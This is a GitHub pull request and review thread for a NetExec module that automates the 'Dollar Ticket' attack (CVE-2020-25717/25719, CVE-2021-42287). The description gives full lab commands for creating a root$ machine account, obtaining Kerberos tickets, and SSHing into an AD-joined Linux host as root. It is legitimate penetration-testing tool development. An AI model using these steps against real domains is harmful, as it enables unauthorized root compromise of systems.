Add Dollar Ticket Attack Module#1224

Open
bl4ckarch wants to merge 9 commits into Pennyw0rth:main from bl4ckarch:feat/dollar-ticket

Conversation

@bl4ckarch bl4ckarch commented Apr 29, 2026

Description

Adds a new module to automate the Dollar Ticket Attack (CVE-2020-25717, CVE-2020-25719, CVE-2021-42287) - a privilege escalation technique targeting Linux/Unix systems joined to Active Directory.

Attack summary:
The attack exploits MIT Kerberos principal-to-username mapping where machine accounts ending with $ are stripped to local usernames. By creating a machine account root$ and requesting a TGT for root (without $), the KDC fallback issues a ticket for root$ which SSH maps to the local root user.

Implementation:

  • Calls existing add-computer module for machine account creation (zero code duplication)
  • Uses Impacket's getKerberosTGT() and getKerberosTGS() directly for ticket generation
  • Generates both TGT and Service Ticket automatically
  • Saves ready-to-use ccache file with both tickets
  • Provides clear exploitation and cleanup instructions

Dependencies:

  • No new dependencies required
  • Uses existing NetExec infrastructure and Impacket functions

The core implementation logic, attack flow, and testing were done manually.

Type of change

  • Bug fix (non-breaking change which fixes an issue)
  • New feature (non-breaking change which adds functionality)
  • Breaking change (fix or feature that would cause existing functionality to not work as expected)
  • Deprecation of feature or functionality
  • This change requires a documentation update
  • This requires a third party update (such as Impacket, Dploot, lsassy, etc)

Setup guide for the review

Test Environment

My Setup:

  • Python: 3.12
  • OS: Ubuntu 24.04 LTS
  • NetExec: Latest main branch

Target Environment:

  • Domain Controller: Windows Server 2025 Build 26100 (BALERION.dracarys.lab)
  • Linux Target: Ubuntu 24.04 LTS (syrax.dracarys.lab) joined with realm join
  • Domain: dracarys.lab
  • Test credentials: Standard domain user (no special privileges)

Prerequisites

  1. Active Directory Domain Controller:

    • Default MachineAccountQuota of 10 (standard Windows configuration)
    • Any Windows Server version (tested on 2025, 2022, 2019)
  2. Linux/Unix Target System:

    • Ubuntu/Debian/RHEL joined to AD using realm join or SSSD
    • SSH with GSSAPI authentication enabled (default for realm-joined systems)
    • A local privileged account (e.g., root, ubuntu, admin)
  3. Domain Credentials:

    • Any authenticated domain user (no special privileges required)
    • MachineAccountQuota must not be exhausted

Step-by-Step Testing

# 1. Run the module against the DC
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=syrax.dracarys.lab

# Expected output:
# - Successfully added 'root$' with password '...'
# - [+] TGT obtained (KDC fallback: root$)
# - [+] Service Ticket obtained for host/syrax.dracarys.lab
# - [+] Tickets saved to: /tmp/dollar_ticket.ccache

# 2. Use the generated ccache file to authenticate
export KRB5CCNAME=/tmp/dollar_ticket.ccache
ssh -o PreferredAuthentications=gssapi-with-mic -l root syrax.dracarys.lab

# 3. Verify privilege escalation
id
# Expected: uid=0(root) gid=0(root) groups=0(root)

# 4. Cleanup - Remove the machine account
netexec smb 192.168.56.10 -u sunfyre -p 'Pass123!' -M add-computer \
    -o NAME=root DELETE=True

Alternative Test Scenarios

# Test with LDAP protocol
netexec ldap 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=ubuntu SSH_TARGET=target.domain.lab

# Test with custom password
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=admin PASSWORD='ComplexPass123!' SSH_TARGET=target.domain.lab

# Test with custom ccache path
netexec smb 192.168.56.10 -u user -p pass -M dollar-ticket \
    -o TARGET_USER=root SSH_TARGET=target.domain.lab TGT_PATH=/tmp/custom.ccache

Verification Commands

# Check machine account was created
netexec ldap <DC_IP> -u <user> -p <pass> --users | grep "root\$"

# Verify ccache contains both TGT and ST
klist -c /tmp/dollar_ticket.ccache
# Expected output:
# - krbtgt/DOMAIN.LAB@DOMAIN.LAB (TGT)
# - host/target.domain.lab@DOMAIN.LAB (Service Ticket)

# Check MachineAccountQuota
netexec ldap <DC_IP> -u <user> -p <pass> -M maq

Expected Results

Success indicators:

  • Machine account root$ created successfully
  • TGT obtained with "KDC fallback" message
  • Service Ticket generated for target host
  • Ccache file saved with both TGT and ST
  • SSH authentication succeeds as target user
  • Privilege escalation confirmed with id command

Known failure scenarios (properly handled):

  • MachineAccountQuota exhausted (error message displayed)
  • Insufficient permissions (error message displayed)
  • SSH_TARGET not FQDN (Kerberos requires DNS names)
  • Target not AD-joined (SSH auth will fail)
  • PAC validation enabled on target (rare, mitigates attack)

Screenshots:

[image]

Successful exploitation:

Checklist:

  • I have run Ruff against my changes (poetry: poetry run ruff check ., use --fix to automatically fix what it can)
  • I have added or updated the tests/e2e_commands.txt file if necessary (new modules or features are required to be added to the e2e tests)
  • If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
  • I have linked relevant sources that describe the added technique (blog posts, documentation, etc)
  • I have performed a self-review of my own code (not an AI review)
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)

Adds automated privilege escalation module for CVE-2020-25717/25719/CVE-2021-42287.

Features:
- Machine account creation via SAMR/LDAPS
- Automated SSH exploitation with Kerberos GSSAPI
- Clean separation: create account -> exploit -> manual cleanup
- Tested successfully on Windows Server 2025 + Ubuntu 24
- Remove UTF-8 encoding declaration (Python 3)
- Use contextlib.suppress() instead of bare except
- Fix trailing whitespace
- Ensure double quotes consistency
- Add newline at EOF
- Use raw docstring for backslashes
- Add whitespace around arithmetic operators
- Convert .format() calls to f-strings
- Add newline at end of file
- Test SAMR account creation (SMB protocol)
- Test LDAPS account creation (LDAP protocol)
- Test custom password parameter
- Test SSH_TARGET reference parameter

All tests passing successfully.
@github-actions

It looks like the PR template may not have been filled out. The following sections appear to be missing:

  • Description

  • Type of change

  • Setup guide for the review

Please edit your PR description to include them. The template helps reviewers understand and test your changes. Thanks!

@NeffIsBack
Member

Thanks for the PR!

However, I see a few issues with this:

  • The SSH attack heavily uses subprocess.run() which then relies on other tooling to be present. That is unfortunately something we don't want to integrate because it has several problems (besides missing packages it also breaks portability to Windows for example)
  • The creation of the computer account seems very similar to add_computer. Blunt question: Wouldn't it be possible to use the add-computer module for the creation of the account and then use kinit/ssh directly?

- Test account creation (add-computer)
- Test custom password parameter
- Test SSH_TARGET reference parameter

All tests passing successfully.
@bl4ckarch bl4ckarch closed this Apr 30, 2026
@bl4ckarch bl4ckarch reopened this Apr 30, 2026
@bl4ckarch
Author

Hi, I refactored the code.
What I removed:

  • All SAMR/LDAPS account creation code
  • Duplicate logic that already existed in add-computer

What was added

  • Directly importing and calling the existing add-computer module for machine account creation
  • Using Impacket's native getKerberosTGT() and getKerberosTGS() functions directly (same as NetExec's generate_tgt() method does). The only difference is that I pass custom credentials (root without $) instead of using self.username/self.password.

Why can't I just call the existing self.connection.generate_tgt()?

  • That method uses self.connection.username and self.connection.password. For the Dollar Ticket attack, I need to request a TGT for root (without $) using the password of root$. The KDC fallback mechanism only works when requesting a ticket for the username WITHOUT the $.

@azoxlpf
Contributor

azoxlpf commented May 5, 2026

I just looked at the attack in more detail and I'm wondering if we really want to make a module for it, since essentially it's just creating a machine account and requesting a ST for the target SSH service, so everything is already doable with nxc except for requesting a ST. We could maybe add a --spn or --service option to --generate-tgt so it chains into a ST request using the retrieved TGT, like getTGT does. What do you think? @NeffIsBack @Dfte


@Dfte
Contributor

Dfte commented May 5, 2026

Adding an option to retrieve the ST looks good to me.
And we'll add documentation to explain why it was added, including the dollar ticket attack mentioned by @bl4ckarch.

@NeffIsBack
Member

Sounds good. Having an option to generate STs is nice anyway, a bit more versatility

@azoxlpf azoxlpf mentioned this pull request May 11, 2026